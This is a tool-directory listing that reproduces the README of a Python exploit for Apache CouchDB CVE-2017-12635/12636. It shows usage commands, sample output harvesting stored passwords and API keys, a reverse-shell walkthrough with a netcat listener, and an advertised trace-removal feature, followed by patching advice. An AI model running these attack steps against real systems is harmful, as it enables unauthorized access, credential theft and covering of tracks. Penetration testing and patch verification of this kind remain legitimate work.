Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/darabium/couchdb-exploit
Privilege EscalationExploitationInformation GatheringPost-ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubdarabium/couchdb-exploit

couchdb-exploit

Exploits CouchDB CVE-2017-12635/12636 for privilege escalation and RCE, then provides an interactive shell with command execution, database browsing, and reverse shell.

View Repository
18 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

🚀 CouchDB Exploit - CVE-2017-12635 & CVE-2017-12636

Python License CVE CVE

Apache CouchDB - Privilege Escalation & Remote Code Execution

GitHub stars GitHub forks


📖 Overview

This tool exploits two critical vulnerabilities in Apache CouchDB:

CVEDescriptionSeverity
CVE-2017-12635Privilege Escalation via JSON Parsing Bypass🔴 Critical
CVE-2017-12636Remote Code Execution via Query Server🔴 Critical

How it works

  1. CVE-2017-12635: Exploits inconsistent JSON parsing between Erlang and JavaScript parsers to create an admin user
  2. CVE-2017-12636: Uses the admin access to configure a malicious Query Server and execute system commands

🎯 Vulnerable Versions

Quick Check

curl http://target:5984/

If version is 1.x.x or 2.0.x/2.1.0 → VULNERABLE

✨ Features

root@kitploit:~
✅ Automatic Exploitation - One command to rule them all

✅ Interactive Shell - User-friendly command interface

✅ Database Viewer - Browse all databases and documents

✅ Full JSON Display - See complete document content

✅ Global Search - Search for keywords across all databases

✅ System Commands - Execute arbitrary commands on the target

✅ Reverse Shell - Get a full interactive shell

✅ Command History - Keep track of your actions

✅ Auto Cleanup - Remove traces after exploitation

✅ Color Output - Easy to read and understand

📦 Installation Prerequisites bash

Python 3.6+ required

python3 --version

Clone & Install bash

Clone the repository

git clone https://github.com/darabium/couchdb-exploit.git cd couchdb-exploit

Install dependencies

pip install -r requirements.txt

Requirements txt

requests>=2.25.0 urllib3>=1.26.0

🚀 Usage Basic Usage bash

Simple exploit

python3 couchdb-exploit.py -t <TARGET_IP> -p

Example

python3 couchdb-exploit.py -t 192.168.1.100 -p 5984

Command Line Options bash

python3 couchdb-exploit.py -h

usage: couchdb-exploit.py [-h] -t TARGET [-p PORT]

arguments: -h, --help show this help message and exit -t TARGET, --target TARGET Target IP address or hostname -p PORT, --port PORT Target port (default: 5984)

💻 Commands

Once exploited, you'll have an interactive shell: Command Description Example db Show all databases with document counts db view View ALL documents in a database (full JSON) view passwords raw Show raw server response raw admin count Count documents in a database count users search Search for a keyword in ALL databases search admin exec Execute a system command exec whoami reverse Setup reverse shell reverse 10.0.0.1 4444 history Show command history history help Show this menu help exit Exit with cleanup exit 📊 Examples

  1. List All Databases bash

couchdb> db

[+] 39 databases:

  1. _replicator (0 docs)

  2. _users (12 docs)

  3. admin (5 docs)

  4. passwords (25 docs)

  5. core-configuration (8 docs) ...

  6. View Database Content bash

couchdb> view passwords

[+] Viewing database: passwords

[*] Total documents: 25

📄 Document #1 ID: user_admin Full content: { "_id": "user_admin", "username": "admin", "password": "Admin123!", "email": "[email protected]", "role": "superadmin" }

  1. Search for Credentials bash

couchdb> search password

[+] Searching for 'password' in all databases...

✅ Found in 'passwords' ID: user1 Content: { "username": "root", "password": "rootpass123" }

✅ Found in 'config' ID: app_settings Content: { "db_password": "secret123", "api_key": "sk_live_abc123" }

  1. Execute System Commands bash

couchdb> exec whoami [+] Executing: whoami [+] Command executed!

couchdb> exec id [+] Executing: id [+] Command executed!

  1. Reverse Shell bash

On your machine (listener)

nc -lvnp 4444

In the exploit

couchdb> reverse 10.0.0.1 4444 [+] Setting up reverse shell to 10.0.0.1:4444 [!] Make sure listener is running: nc -lvnp 4444 [?] Continue? (y/n): y [+] Reverse shell triggered!

You should get a shell on your listener!

🖼️ Screenshots Exploit in Action

https://via.placeholder.com/800x400?text=Exploit+Demo+Screenshot Database View

https://via.placeholder.com/800x400?text=Database+View Reverse Shell

https://via.placeholder.com/800x400?text=Reverse+Shell ⚠️ Disclaimer

root@kitploit:~
IMPORTANT: This tool is for educational and authorized testing purposes only.

    🚫 Do NOT use on systems without explicit permission

    🚫 The author is not responsible for any misuse

    🚫 Use only in controlled environments or your own systems

    ✅ Always get written authorization before testing

    ✅ Follow responsible disclosure practices

By using this tool, you agree to these terms. 🔐 Security Tips

If you're a system administrator:

root@kitploit:~
Upgrade immediately to CouchDB ≥ 1.7.0 or ≥ 2.1.1

Use firewall to restrict access to port 5984

Enable authentication and use strong passwords

Monitor logs for suspicious activity

Regular security audits of your infrastructure

Quick Fix bash

Upgrade CouchDB

sudo apt-get update sudo apt-get install couchdb=2.1.1 # Or latest version

Restrict access

sudo ufw allow from 192.168.1.0/24 to any port 5984

📚 References

root@kitploit:~
CVE-2017-12635 - NVD

CVE-2017-12636 - NVD

Apache CouchDB Security

Exploit-DB

👤 Author

darabium

root@kitploit:~
GitHub: @darabium

Telegram: @darabium

⭐ Support

If you find this useful:

root@kitploit:~
⭐ Star the repository

🐛 Report issues

🔧 Contribute improvements

📢 Share with others

📄 License

This project is licensed under the MIT License - see the LICENSE file for details.

Made with ❤️ for security research

⬆ Back to Top

Download Tool
VersionVulnerableFixed Version
Apache CouchDB < 1.7.0✅ Yes1.7.0
Apache CouchDB 1.x.x✅ Yes1.7.0
Apache CouchDB 2.0.0✅ Yes2.1.1
Apache CouchDB 2.1.0✅ Yes2.1.1
Apache CouchDB ≥ 2.1.1❌ No-